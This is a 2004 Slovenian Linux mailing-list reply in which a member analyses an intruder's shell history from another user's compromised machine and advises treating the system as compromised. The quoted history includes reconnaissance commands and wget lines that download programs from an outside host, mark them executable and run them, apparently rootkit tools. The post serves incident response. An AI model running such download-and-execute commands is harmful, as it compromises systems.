[LUGOS] wget
Andrej Mršek
andrej.mrsek at volja.net
Tue Feb 10 10:40:03 CET 2004
klik wrote:
>Ali morda kdo ve, kaj mi je nekdo počel v računalniku
>w
>uname -a
>cd /tmp
>ls
>cat /etc/*rel*
>
Do sem je malce pogledal kakšen sistem imaš
>wget freeweb.siol.net/stuclb99/d
>chmod +x d
>./d
>
iz tega naslova (freeweb.siol.net) je potegnil program z imenom d, mu
postavil x bit (torej gre za program) in ga pognal.
>wget freeweb.siol.net/stuclb99/x
>chmod +x x
>./x
>./x
>
Nato je podobno napravil še s programom x
Kaj za eni programi so x in d pa ve samo lastnik (predvidevam da je
struclb99 kak username pri Siol-u), lahko da so kakšna root-kit tools
ali pa kaj drugega. Lahko smatraš, da je sistem kompromitiran in ukrepaš.
Lep pozdrav, Andrej
More information about the lugos-list
mailing list